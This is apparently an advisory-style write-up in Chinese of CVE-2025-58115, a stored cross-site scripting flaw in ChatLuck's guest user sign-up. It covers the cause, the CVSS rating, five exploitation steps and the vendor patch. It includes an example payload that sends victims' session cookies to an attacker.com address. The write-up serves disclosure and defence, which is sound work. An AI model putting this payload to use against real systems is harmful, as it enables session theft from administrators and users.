CVE-2025-58115CVE-2025-58115是日本ChatLuck即时通讯软件中发现的一个跨站脚本(XSS)安全漏洞。该漏洞存在于ChatLuck产品的访客用户注册(Guest User Sign-up)功能中,由JPCERT/CC的vultures团队发现并报告。ChatLuck是一款面向企业的内部即时通讯工具,支持访客用户注册功能,允许外部访客以临时身份加入聊天会话。
该漏洞的CVSS 3.0评分为6.1分,属于中危级别。攻击者可以通过构造恶意的注册请求,在访客注册表单的输入字段中注入恶意JavaScript代码或HTML标签。由于应用未对用户输入进行充分的过滤和转义处理,恶意脚本会被存储在服务器端,当其他用户(包括管理员和合法用户)访问包含恶意内容的页面时,嵌入的脚本将在其浏览器中执行。
该漏洞的影响范围包括机密性和完整性的低程度损害。虽然不需要认证即可利用,但需要用户交互(如点击链接或访问恶意页面)才能触发攻击。由于漏洞影响范围发生了变化(Scope Changed),表明该漏洞可能影响到应用安全边界之外的组件,增加了实际危害性。
该漏洞由JPCERT/CC于2025年10月16日公开披露,ChatLuck供应商已发布安全补丁修复此问题。建议所有使用ChatLuck的企业用户尽快更新到最新版本以消除安全风险。
ChatLuck访客注册功能中的XSS漏洞源于服务端对用户提交数据的不安全处理。在访客注册流程中,用户需要填写包括用户名、显示名称、邮箱等在内的多个表单字段。应用将这些字段直接存储到数据库中,并在后续页面渲染时未经过充分的HTML实体编码或输出转义就直接输出到HTML响应中。
攻击原理:攻击者首先构造一个包含恶意JavaScript代码的注册请求,例如在显示名称字段中注入`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`。当受害者(如管理员)查看包含该访客信息的页面时,浏览器会解析并执行嵌入的恶意脚本。
利用方式:
1. 攻击者访问ChatLuck的访客注册页面,填写注册表单;
2. 在可注入的字段(如显示名称、备注等)中插入恶意脚本代码;
3. 提交注册请求,恶意脚本被持久化存储到服务端;
4. 当管理员或其他用户查看访客列表、聊天记录等包含该恶意数据的页面时,脚本自动执行;
5. 攻击者可窃取用户会话Cookie、进行钓鱼攻击、篡改页面内容或执行其他恶意操作。
由于CVSS向量中包含S:C(Scope Changed),表明该存储型XSS可能突破ChatLuck应用的安全边界,影响到同源的其他应用或浏览器上下文。由于需要用户交互(UI:R)才能触发,实际利用需要诱导受害者访问受影响的页面。